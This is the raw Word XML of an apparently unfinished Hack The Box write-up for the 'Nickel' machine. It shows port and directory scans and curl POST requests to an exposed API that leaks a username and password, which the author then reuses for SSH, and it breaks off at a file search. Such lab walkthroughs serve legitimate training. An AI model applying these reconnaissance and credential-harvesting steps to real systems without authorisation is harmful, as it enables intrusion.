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FE76" w14:textId="57D146D6" w:rsidR="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843DCE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">HTB Machine: </w:t>
      </w:r>
      <w:r w:rsidR="00C54352">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nickel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D04FF3" w14:textId="77777777" w:rsidR="00843DCE" w:rsidRPr="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2336EAB7" w14:textId="531C7167"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1. Machine Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD73D3C" w14:textId="77777777" w:rsidR="00843DCE" w:rsidRPr="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843DCE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Short Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB22895" w14:textId="77777777" w:rsidR="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29B9A771" w14:textId="05376F36"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2. Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52595731" w14:textId="3C341C8E" w:rsidR="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843DCE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nmap Scan Command:</w:t>
      </w:r>
      <w:r w:rsidR="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E26AE6" w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sudo nmap -Pn -n $IP -sC -sV -p- --open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E26191" w14:textId="2491FD2F" w:rsidR="00E26AE6" w:rsidRPr="00843DCE" w:rsidRDefault="00E26AE6" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sudo nmap -Pn -n $IP -sU --top-ports=100 --reason</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52999D37" w14:textId="77777777" w:rsidR="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62E2A5C3" w14:textId="12689E9D"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3. Web Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9F6897" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Then we see seven open ports: 21,22,135,139,3389,8089,33333. Ignore the error message at the end, SMB will not show up without port 445.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307C489D" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Before we take a swing at each one individually, we notice two web servers. It’s best practice to get the Gobuster scan going as early as possible so it can be running in the background. I’ll target port 8089 first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFA8E1F" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sudo gobuster dir -w '/home/kali/Desktop/wordlists/dirbuster/directory-list-2.3-medium.txt' -u http://$IP:8089 -t 42 -b 400,401,403,404 --no-error --exclude-length 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B07F09" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 21 — FTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030681B9" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Let’s check it out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A33D5DC" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Since it reads Beta, I’m going to look for public exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78971789" w14:textId="2939D1BA" w:rsidR="00843DCE" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>It appears as if there </w:t>
      </w:r>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> an exploit for </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00E26AE6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>privilege escalation.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> I’ll keep that in my back pocket for later if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F72D72" w14:textId="77777777" w:rsidR="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF7D628" w14:textId="6A3118F3"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4. Code Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBC1E3E" w14:textId="77777777" w:rsidR="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AAABFB4" w14:textId="77777777" w:rsidR="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78E5BB1E" w14:textId="5EE10C89"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5. Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AB6EB1" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 3389 — Remote Desktop Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C225A8" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>It’s always nice to see this (if we can find credentials). We are given the DNS name, which we already added to our /etc/hosts file. Sometimes we can get additional info, like a username, with an empty rdesktop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76573B5C" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 8089 — Web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8D1F87" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The gobuster scan finished without a hit. We will move our scan to the other web server on 33333 while we browse this one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2A8F25" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>It appears to be calling endpoints on the other web server located at port 33333 but the web address is </w:t>
      </w:r>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>either</w:t>
      </w:r>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> hard-coded as an Automatic Private IP Address or it is being back-end populated by a broken DHCP service which doesn’t seem the case. Either way from the port number (33333) we can guess that this should be pointing to the machine’s actual current IP or something like localhost or 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC266AB" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A quick check to our Gobuster scan of this port does not reveal anything useful. We will have work with what we have.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF748A1" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Let’s go to port 33333 before we do anything else.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEBA2A1" w14:textId="33F47CFB" w:rsidR="00843DCE" w:rsidRDefault="00E26AE6" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We see a 200 OK response indicating that the endpoint </w:t>
      </w:r>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>does</w:t>
      </w:r>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> exist. The way the message is worded implies we are using the wrong HTTP verb, maybe POST?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C10D17" w14:textId="03F05435" w:rsidR="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl -i http://$IP:33333/list-current-deployments -X POST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3620FF8B" w14:textId="77777777" w:rsidR="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CEF4102" w14:textId="77777777" w:rsidR="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843DCE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6. Shell Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6260EB" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl -i http://$IP:33333/list-current-deployments -X POST -H 'Content-Length: 0'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CC8CBC" w14:textId="4C2CC6E0" w:rsidR="00843DCE" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Press enter or click to view image in full size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB09211" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl -i http://$IP:33333/list-running-procs -X POST -H 'Content-Length: 0'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E080CD" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This strikes gold returning with a list of running processes, the most import containing a username and password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BDA903" w14:textId="5DB9FE28" w:rsidR="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Press enter or click to view image in full size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E64899A" w14:textId="3E8AE1C7" w:rsidR="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>For completion I’m also going to check the final endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E12EE14" w14:textId="468DB5F1" w:rsidR="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>To SSH!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243DFCE6" w14:textId="6977EC58" w:rsidR="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We will try that. It looks passwordy-ish.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2A148D" w14:textId="77777777" w:rsidR="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7367FE24" w14:textId="4A3FC9B5"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7. Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E407FB6" w14:textId="765A0B27" w:rsidR="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dir /s *.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAEBE44" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
